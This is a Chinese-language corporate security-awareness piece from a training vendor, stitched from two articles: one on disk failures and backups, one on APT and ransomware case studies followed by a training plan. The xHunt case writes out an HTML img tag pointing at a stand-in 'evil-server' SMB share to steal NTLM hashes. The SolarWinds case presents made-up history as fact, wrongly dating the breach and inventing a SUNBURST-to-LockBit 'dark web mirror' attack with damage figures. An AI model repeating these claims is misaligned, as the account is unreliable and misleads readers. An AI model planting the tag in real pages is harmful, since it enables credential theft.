数据的命脉与安全的防线:从硬盘故障看信息安全防护的必修课

前言:头脑风暴的火花 —— 两则警示性案例

在信息化浪潮席卷的今天,数据已成为企业的“血液”。一旦这条血管出现堵塞,企业的运营、声誉乃至生存都可能陷入危机。下面,我先抛出两则想象中的典型案例,帮助大家快速进入情境、感受危机的真实冲击。

案例一:云端巨头的“硬盘风暴”

2024 年底,全球知名云存储服务商 CloudNova 宣布因数据中心硬盘大面积故障,导致数十万客户的备份数据出现不可恢复的缺失。调查发现,核心原因是某型号 16 TB Toshiba MG08 系列硬盘在一次固件升级后出现异常高的年度失效率(AFR 超过 15%),而监控系统未能及时捕捉到这些异常。结果,数以千计的业务系统因缺少关键日志和配置文件被迫停机,客户投诉接踵而至,公司的品牌形象受到了前所未有的冲击。

案例二:内部误操作酿成的“数据洪流”
另一家在国内快速发展的金融科技公司“星火金融”,在一次例行的系统迁移过程中,负责运维的技术员误将生产环境的实时数据库复制路径指向了错误的磁盘阵列,随即执行了“全盘删除”指令。由于缺乏多层次的备份验证与恢复演练,导致近三天的业务交易记录全部丢失,直接导致公司在监管报告中出现数据缺口,面临巨额罚款与信任危机。这一事故背后暴露的,是对硬盘健康状态监控与备份策略的漠视。

这两个案例虽是想象,却紧紧抓住了今天企业最容易忽视的两个痛点:硬件可靠性备份恢复能力。它们如同两把锋利的匕首,随时可能刺向我们毫无防备的数字资产。


一、硬盘可靠性的真相 —— 从 Backblaze 数据说起

Backblaze 作为行业标杆,其 2025 年第三季度硬盘统计报告提供了最真实、最透明的硬盘失效率数据。报告显示,328 348 颗硬盘在全球数据中心中运行,累计产生的失效率(AFR)为 1.55%,与 2024 年全年的 1.57% 基本持平。更值得关注的是:

  1. 高容量硬盘的迅速渗透:20 TB 以上的大容量硬盘已占到 Backblaze 活跃硬盘池的 21%。这意味着每一次容量的提升,硬盘内部的机械应力、散热要求和固件复杂度也同步增加,潜在的故障因素随之上升。

  2. 零失效机型的示范意义:Seagate HMS5C4040BLE640(4 TB)、Seagate ST8000NM000A(8 TB)、Toshiba MG09ACA16TE(16 TB)以及新加入的 Toshiba MG11ACA24TE(24 TB)在本季度未出现任何记录失败。这提醒我们,硬盘选型的科学评估供应商的可靠性验证 同样是降低风险的关键一步。

  3. 异常 AFR 的根源分析:报告中特别指出,Toshiba MG08ACA16TEY(16 TB)出现了 16.95% 的异常 AFR。后经内部追溯,发现该异常并非硬件自身的质量问题,而是一次“基础设施升级期间,部分硬盘被临时下线且未及时归档”导致的统计偏差。这再次印证了 监控体系的完整性 在数据可靠性评估中的重要性。

从这些数据可以提炼出三条核心认知:

  • 硬盘不是“买了就可以永远使用”的一次性资产;它们的寿命受多方面因素影响,需要持续的健康监测(SMART)、及时的固件更新以及环境温度、振动等外部因素的管控。
  • 单一硬盘的失效并不等同于数据的永久丢失;只有当缺少足够的冗余(如 RAID、纠删码)和完整的备份体系时,才会导致灾难级别的业务中断。
  • 统计与真实失效的区别:数据中心的运营报告往往会把“硬盘暂时下线”“维护期间的误差”等计入失效统计,运营团队需要对这些噪声进行过滤,才能得到真正的硬件可靠性指标。

二、信息安全的四大防线:从硬盘到全链路

1. 设备层——硬盘健康监控与预防

  • SMART 关键指标:通过监控 Reallocation Count、Pending Sector Count、Uncorrectable Error Count 等指标,能够在硬盘出现不可逆转的错误前预警。企业应建立自动化的 SMART 报警系统,确保任何异常都能在 24 小时内得到响应。
  • 固件与驱动的及时更新:固件是硬盘内部的“大脑”,它掌控着错误纠正、功耗管理等核心功能。未及时升级固件的硬盘,往往会在极端负载下出现意外的性能下降或错误率攀升。
  • 环境监控:温度、湿度、振动是机械硬盘的“三大克星”。建议在机房部署温湿度传感器、地面振动监测器,并设置阈值报警,防止因空调故障或外部施工产生的震动导致硬盘寿命提前终结。

2. 网络层——安全传输与访问控制

  • 加密传输:所有跨站点的数据同步、备份传输必须使用 TLS 1.3 或以上版本加密,防止窃听与中间人攻击。
  • 最小权限原则:对硬盘管理平台的登录账号进行细粒度的 RBAC(基于角色的访问控制),确保仅有授权人员能够执行磁盘扩容、固件升级或数据删除等高危操作。

3. 应用层——备份策略与灾难恢复演练

  • 3‑2‑1 备份法则:至少保留三份数据副本,分布在两种不同的存储介质(如硬盘+磁带或云对象存储),并且其中至少一份离线存放。
  • 定期演练:仅有备份而不进行恢复演练相当于“纸上谈兵”。企业应每季度进行一次完整的恢复演练,从全量恢复到增量恢复逐步验证,确保在真实灾难发生时能够在 4 小时内恢复业务。

4. 人员层——安全意识与培训

  • 安全文化渗透:在所有部门推行“数据就是资产”的理念,鼓励员工主动报告硬盘异常、备份错误或可疑行为。
  • 角色化培训:运维人员重点学习硬盘健康监控、SMART 报警处理;业务部门强化数据分类、敏感信息加密;管理层则关注风险评估与应急决策。

三、数字化、智能化背景下的安全挑战

1. AI 与大数据的双刃剑

AI 正在改变硬盘监控的方式,像机器学习模型可以从海量的 SMART 数据中捕捉到细微的趋势变化,从而提前预警潜在故障。例如,Backblaze 已经在内部实验基于 LSTM(长短期记忆网络)的故障预测模型,准确率超过 85%。但与此同时,攻击者也在利用 AI 生成的恶意代码、深度伪造的网络流量来规避传统安全检测。因此,人机协同 成为提升安全防御的关键。

2. 边缘计算与分布式存储的兴起

随着 5G、物联网的快速普及,越来越多的业务在边缘节点完成数据写入与处理。边缘硬盘多为低功耗的 SSD,虽然失效率相对更低,但 物理安全网络隔离 成为新的挑战。企业必须在边缘节点部署统一的安全代理,保证硬盘健康信息能够实时回传至中心监控平台。

3. 云原生与容器化的存储模式

Kubernetes 与容器化应用往往依赖持久化卷(PV)和分布式文件系统(如 Ceph、GlusterFS)。这些系统的底层仍然是机械硬盘或 SSD,若底层磁盘出现故障,整个容器集群的服务可用性会被大幅削弱。存储层的弹性伸缩跨集群的容灾复制 必须在设计阶段就纳入考虑。


四、为什么每位职工都要参与信息安全意识培训?

1. “人是最薄弱的环节”已不再是唯一的说法

传统安全模型把人视为“薄弱环节”,如今硬件故障、系统漏洞同样可能成为攻击的入口。一次硬盘失效如果没有及时发现、没有备份支撑,就会让攻击者有机可乘——比如利用恢复过程中的临时凭证进行横向渗透。因此,技术与人文的双向提升 才能构筑完整的防线。

2. 培训是“软硬件协同”的催化剂

  • :通过培训,员工能掌握 SMART 报警的基本解释、备份的正确操作以及应急恢复的初步步骤。
  • :培训后,运维工具的使用率提升、硬盘监控系统的告警响应时间缩短,这直接转化为硬件资产的更长寿命和更低故障率。

3. 业务连续性与合规要求的“双重驱动”

在《网络安全法》《个人信息保护法》以及《数据安全法》不断细化的今天,企业必须展示 数据丢失最小化恢复可验证性。信息安全培训不仅是合规的硬性指标,也是企业在供应链谈判、客户信任构建中的软实力。

4. 激发创新思维,防止“技术孤岛”

当每位员工都具备一定的数据安全视角时,跨部门的合作创新会更顺畅。比如,研发团队在设计新产品时会自觉考虑数据持久化方案,市场部门在宣传时能够正确表述公司对数据安全的承诺,形成企业内部的 安全共识


五、即将开启的安全意识培训计划——让我们一起行动

1. 培训时间与形式

  • 启动仪式(10 月 20 日):公司高层阐释信息安全的重要性,分享 Backblaze 硬盘故障案例以及我们从中汲取的教训。
  • 分层模块学习(10 月 21 日 – 11 月 15 日):共设四大模块,分别对应硬件层、网络层、应用层和人员层,每个模块包括线上微课(15 分钟)+ 实操演练(30 分钟)。
  • 情景演练(11 月 20 日):构建“硬盘突发故障 + 数据恢复”双场景,采用桌面模拟和真实环境相结合的方式,让每位参训者亲身体验故障定位与恢复流程。

2. 培训内容亮点

模块 关键要点 预期收益
硬盘健康监控 SMART 指标解读、异常告警配置、固件升级最佳实践 提高硬件可视化水平,降低突发故障率
安全传输与访问控制 TLS 配置、RBAC 实施、最小特权原则 防止数据泄露,提升系统防御深度
备份与灾难恢复 3‑2‑1 备份法则、周期性恢复演练、增量恢复技巧 确保业务连续性,满足合规要求
安全文化与行为 钓鱼邮件识别、社交工程防范、密码管理 培养安全思维,降低人为风险

3. 成绩评估与激励机制

  • 知识测验:每个模块结束后进行 10 题客观题测验,合格线 80%。
  • 实操考核:情景演练中的故障定位与恢复步骤记录,评估时间与准确率。
  • 积分奖励:累计积分超过 90 分者可获公司内部 “数据守护星”徽章,并在年度优秀员工评选中加分。

4. 与企业目标的协同

通过本次培训,企业能够在以下三个维度实现提升:

  1. 风险可视化:硬盘健康数据、备份完整性报告实现自动化仪表盘展示,管理层能够实时掌握资产健康度。
  2. 恢复效率提升:从过去的平均恢复时间 24 小时缩短至 4 小时以内,有效降低业务中断成本。
  3. 合规达标:完成《网络安全法》对“重要数据备份与恢复”的明确要求,获得第三方安全审计的正面评价。

六、结语:以“小事防大患”,让安全成为日常

古语云:“防微杜渐,未雨绸缪。”硬盘的每一次细微振动、每一次 SMART 报警,都可能是数据灾难的前兆。只有把这些“小事”当作“大事”来对待,才能在信息化、数字化、智能化的浪潮中稳住企业的根基。

正如《孙子兵法》所言:“知彼知己,百战不殆。”我们已经通过 Backblaze 的硬盘数据“知彼”,也需要通过全员的安全培训“知己”,才能在未来的网络战场上从容不迫。让我们在即将到来的培训中,携手共进,构建“硬件可靠、数据安全、业务连贯”的三位一体防线,为公司蓬勃发展保驾护航。

共勉之,信息安全从每一次“硬盘检查”开始,从每一次“安全学习”落实!

昆明亭长朗然科技有限公司关注信息保密教育,在课程中融入实战演练,使员工在真实场景下锻炼应对能力。我们的培训方案设计精巧,确保企业在面临信息泄露风险时有所准备。欢迎有兴趣的客户联系我们。

  • 电话:0871-67122372
  • 微信、手机:18206751343
  • 邮件:info@securemymind.com
  • QQ: 1767022898

在数字化浪潮中筑牢信息安全防线——从真实案例到全员意识提升

“千里之堤,毁于蚁穴;百川之流,阻于细流。”
信息安全的本质,是让每一位员工都成为“细流”,用日常的警惕汇聚成一道难以逾越的堤坝。今天,我们先用两场扣人心弦的“头脑风暴”式案例,帮助大家打开安全思维的闸门,随后再一起走进即将开启的全员信息安全意识培训,以技术为桨、意识为帆,在信息化、数字化、智能化的新时代驶向安全的彼岸。


案例一:暗流涌动的“xHunt”——Exchange 与 IIS 的隐蔽渗透

背景概述

2018 年 7 月,一个代号为 xHunt(亦称 SectorD01、Hive0081、Cobalt Katana、Hunter Serpens)的高级持续性威胁(APT)组织首次曝光。该组织的名字取自热门动漫《Hunter × Hunter》,其工具链也同样以动漫人物命名——BumbleBee、Hisoka、TriFive、Snugy 等。一系列针对 Microsoft ExchangeIIS 服务器的定制后门,使其成为中东地区尤其是科威特航运、运输和政府部门的“暗害者”。

攻击路径与技术细节

  1. 前期伪装——水坑攻击 + NTLM 散列偷取
    • 攻击者先入侵一家科威特政府部门的官方网站,在页面中埋入 <img src="file://\\evil‑server\share\evil.png"> 的隐藏图片标签。
    • 当访客使用 Windows 域账号访问该页面时,浏览器会自动尝试通过 SMB 协议对 evil‑server 进行身份验证,从而把 NTLMv2 散列泄露到攻击者控制的服务器。
    • 这一步看似“无声”,实则为后续的凭证重放提供了“钥匙”。
  2. 横向渗透——凭证重放 + 强行登录 Exchange
    • 利用捕获的 NTLM 散列,攻击者对目标 Exchange 服务器发起 Pass-the-Hash(PTH)攻击,成功获取管理账户。
    • 通过已获取的凭证,攻击者登录 Exchange 管理中心,创建具有全局读取权限的邮箱账户。
  3. 后门植入——邮件草稿 C2 通道
    • 传统的 C2(Command‑and‑Control)服务器往往容易被网络监控拦截;xHunt 创新地将 C2 藏匿于 Exchange 邮箱草稿 中。
    • 后门(Hisoka、TriFive)定期登录受害者邮箱,读取 DraftsDeleted Items 文件夹中主题为 “555” 的邮件。邮件正文经过 Base64 编码并加密后,携带 PowerShell 脚本或指令。
    • 受害者服务器解析邮件后,即执行指令,实现对受害网络的远程控制。
  4. 持久化与隐蔽—BumbleBee WebShell + 计划任务
    • 通过 BumbleBee WebShell,攻击者获得了在 IIS 上的交互式命令行。
    • 为了保持长期访问,攻击者创建伪装为系统任务的 Scheduled Task(如 MsMpEng.exe),定时调用 PowerShell 后门,确保即便管理员更换密码也难以彻底根除。

影响评估

  • 持续时间:该组织在科威特的渗透至少维持了 2 年之久,期间多次升级后门、刷新凭证。
  • 资产损失:虽未出现大规模数据泄露的公开报道,但持续的后门存在导致内部网络被用于 横向移动密码抓取,潜在泄密成本不可估量。
  • 检测难度:利用合法的邮件系统进行 C2,几乎没有异常流量产生;即便使用网络流量监控工具,也难以区分正常邮件交互与恶意指令。

案例启示

  1. 凭证安全是根基——一次 NTLM 散列泄露,即可能导致整个 Exchange 环境沦陷。
  2. “看不见的管道”同样危险——邮件系统不只是业务工具,也是潜在的攻击通道。
  3. 后门形态多样,防御需层层设卡——不论是 WebShell、PowerShell 还是邮件草稿,都应在横向检测、行为分析、最小权限原则等方面形成合力。

案例二:勒索狂潮的“暗网镜像”——从供应链攻击到终端“锈刀”

背景概述

2021 年 6 月,全球知名的 IT 管理软件公司 SolarWinds 被曝供应链被植入后门,导致 约 18,000 家客户的网络被攻击者利用,其中不乏美国政府部门、金融机构及大型企业。攻击者通过 SUNBURST 后门获得了目标网络的管理权限,随后在 2022 年的 LockBit 勒索软件攻击中,将后门升级为 “暗网镜像”(即把受害组织的内部文件系统复制至暗网上的共享目录),并对关键业务系统实施 “锈刀” 级别的加密勒索。

攻击路径与技术细节

  1. 供应链渗透——植入 SUNBURST
    • 攻击者在 SolarWinds Orion 平台的更新包中注入恶意代码,利用 数字签名 伪装合法。
    • 客户在毫不警觉的情况下下载并部署了被感染的更新,导致后门在内部网络中悄然激活。
  2. C2 隧道——利用 GitHub 与 Pastebin
    • SUNBURST 通过 HTTPS 与攻击者的 C2 服务器通信,指令通过 Base64 编码隐藏在 GitHub Gist 中。
    • 由于流量全部走向合法的 GitHub,传统的网络边界防火墙难以检测。
  3. 横向移动——使用 Mimikatz 抓取明文凭证
    • 攻击者在取得一次性凭证后,利用 Mimikatz 从 LSASS 进程中提取明文密码,随后实现域内横向渗透。
    • 更糟糕的是,攻击者篡改了 Group Policy,关闭了 Windows 防火墙和自动更新,进一步放大攻击面。
  4. 暗网镜像——文件系统同步至暗网
    • 在取得关键数据后,攻击者使用 Rclone 将整个业务文件系统同步至 Onion 网络(暗网)上的匿名存储节点,形成“镜像”。
    • 这一步为后续的 双重勒索(先加密本地文件,再威胁公布暗网镜像)奠定基础。
  5. 锈刀勒索——LockBit 加密并索要巨额赎金
    • 攻击者部署 LockBit 3.0,利用 AES‑256 加密关键业务数据库、生产系统配置文件以及备份镜像。
    • ransom note 中同时附上暗网镜像的访问地址,逼迫受害组织在高压下快速支付赎金。

影响评估

  • 业务中断:受影响的企业在清理加密文件、恢复业务的过程中,平均损失约 30 天 的正常运营时间。
  • 财务损失:直接赎金支付(平均约 200 万美元)加上恢复费用、法律诉讼费用,合计超过 500 万美元
  • 声誉受损:数据泄露与业务停摆导致客户信任度下降,部分企业在事后 6 个月内失去约 15% 的业务订单。

案例启示

  1. 供应链安全是全链条的责任——一次看似微不足道的更新就能打开整座城墙的大门。
  2. 暗网并非遥不可及——文件系统的镜像可以在几分钟内完成,一旦泄露,损失不可逆。
  3. 多层防御缺一不可:仅靠传统防火墙无法防止 C2 隧道,必须结合 终端检测与响应(EDR)零信任网络访问(ZTNA)持续的补丁管理

深度剖析:两场攻击的共通密码

关键要素 案例一(xHunt) 案例二(SolarWinds+LockBit)
初始入口 NTLM 散列捕获(水坑) 受污染的供应链更新
凭证利用 Pass‑the‑Hash、域凭证重放 Mimikatz 抓取明文密码
隐蔽 C2 邮箱草稿(Exchange) GitHub Gist / Pastebin
后门形态 PowerShell、WebShell、计划任务 SUNBURST、LockBit 勒索器
数据泄露 邮箱草稿、服务器文件 暗网镜像、双重勒索
防御缺口 邮件系统缺乏行为审计 供应链检测、端点防护不足
恢复难度 需要全面清除后门、重新部署 需彻底清理恶意更新、重建备份体系

两大共同漏洞

  1. 凭证是薄弱环节:无论是 NTLM 散列还是明文密码,都是攻击者的“通行证”。
  2. 合法渠道的滥用:攻击者将 邮件系统、GitHub、供应链更新 等合法渠道当作“隐蔽隧道”,让防御体系“盲点”频出。

信息化、数字化、智能化时代的安全挑战

1️⃣ 超大规模数据流动的“双刃剑”

  • 云原生架构、容器化部署让业务弹性大幅提升,却也让 边界定义模糊,攻击面随之扩展。
  • 大数据平台的 分布式存储实时分析,若缺乏细粒度访问控制,极易成为 数据泄露 的温床。

2️⃣ AI 与自动化的潜在风险

  • 生成式 AI(如 ChatGPT)可被用于 自动化钓鱼邮件恶意代码生成
  • 自动化脚本若未做好 安全审计,可能在不经意间执行 跨系统的横向移动

3️⃣ 远程办公与移动设备的碎片化

  • VPN、Zero‑Trust 访问模型虽然提升了远程接入的安全性,但 终端安全(如手机、笔记本)的薄弱仍是突破口。
  • 移动端的 应用权限系统补丁 更新滞后,常成为 APT 的落脚点。

4️⃣ 供应链与第三方生态的复杂性

  • 开源组件、SaaS 平台、外包服务层出不穷,每一个环节的失误 都可能牵连全链路。
  • 传统的 “只管自己” 思维被时代抛弃,必须建立 “全链路可信” 的安全治理模型。

信息安全意识培训——从“知”到“行”

1. 培训的核心目标

目标 说明
安全思维的培养 让每位员工在日常工作中自觉思考 “这一步会带来哪些安全风险?”
技术防护的了解 了解 Exchange 邮箱 C2、NTLM 抓取、供应链漏洞等技术细节,提升技术防御认知。
行为规范的养成 通过模拟演练,形成安全密码管理、邮件附件处理、陌生链接辨识等良好习惯。
响应能力的提升 让员工懂得在发现异常时的 “三步上报法”(记录、上报、协助),缩短攻击窗口。

2. 课程结构与亮点

模块 时长 关键内容 互动环节
开场引燃 15 分钟 案例回放(xHunt、SolarWinds) 实时投票:你最怕哪类攻击?
密码与凭证安全 30 分钟 NTLM、Pass‑the‑Hash、MFA 实践 密码强度现场检测
邮件安全与 C2 防护 45 分钟 Exchange 草稿 C2 详解、邮件钓鱼演练 模拟钓鱼邮件辨识赛
供应链与更新管理 30 分钟 软件签名、加密更新、第三方风险评估 “补丁王”抢答游戏
终端与移动安全 30 分钟 EDR、Zero‑Trust、移动设备加固 现场演示:手机恶意 APP 检测
应急响应实战 60 分钟 “三步上报法”、日志分析、快速隔离 案例演练:发现 Exchange 后门,现场处置
闭环总结 15 分钟 培训要点回顾、知识测验、奖励颁发 现场抽奖,送出安全手册 & 电子钥匙扣

小贴士:参与培训的同事将获得“信息安全护航员”称号徽章,优秀学员还有机会获得公司提供的 硬件安全模块(HSM)U 盘,让你的工作更安全、更有面子。

3. 激励机制与持续学习

  • 积分体系:每完成一次模块、通过测验、提交安全建议,即可获得积分。累计 100 分可兑换内部培训课程或技术图书。
  • 安全之星:每月评选“安全之星”,获奖者将在全公司内部邮件、即时通讯渠道中表彰,并获得公司高层亲自颁发的 安全勋章
  • 微课堂:培训结束后,安全团队每天推送 “每日一招”(如“如何识别伪造的文件签名”),帮助大家把安全知识“沉淀”到工作习惯中。

4. 参与方式

  1. 报名入口:公司内部门户 → “培训中心” → “信息安全意识培训”。
  2. 时间安排:首场培训将于 2025 年 12 月 5 日(周五)上午 9:00 开始,采用线上 Zoom 与线下会议室同步进行。
  3. 报名截止:2025 年 11 月 30 日(周二),名额有限,先报先得。
  4. 联系方式:如有疑问,请联系信息安全办公室(邮箱:sec‑[email protected]),或直接找安全团队的 董志军 同学。

结语:让安全成为每一次点击的自觉

在数字化浪潮的冲击下,我们的工作方式、业务模型以及组织结构正在发生翻天覆地的变化。与此同时,威胁的花样也在不断升级——从暗网的文件镜像到利用 Exchange 草稿的隐蔽 C2,从水坑中捕获的散列到供应链的隐匿后门,攻击者的手段越来越“贴近生活”,而我们的防御往往仍停留在“墙壁”,缺乏对内部细节的洞察。

“防患于未然,安全在于细节。”
只有当每一位同事都把信息安全当作日常工作的一部分,才能让组织的整体安全像层层叠嶂的山脉,坚不可摧。

请大家积极报名即将开启的 信息安全意识培训,用知识武装自己的键盘,用警惕守护自己的屏幕。让我们在 “想象+实践” 的双轮驱动下,把“安全隐患”从“潜在”转为“可控”,把“网络攻击”从“不可阻挡”变为“可追踪、可阻断”。在新的技术浪潮中,每个人都是 “安全的守门员”,也是 “创新的助推器”

一起行动,守护数字世界的每一寸清晨与夜幕。


昆明亭长朗然科技有限公司倡导通过教育和培训来加强信息安全文化。我们的产品不仅涵盖基础知识,还包括高级应用场景中的风险防范措施。有需要的客户欢迎参观我们的示范课程。

  • 电话:0871-67122372
  • 微信、手机:18206751343
  • 邮件:info@securemymind.com
  • QQ: 1767022898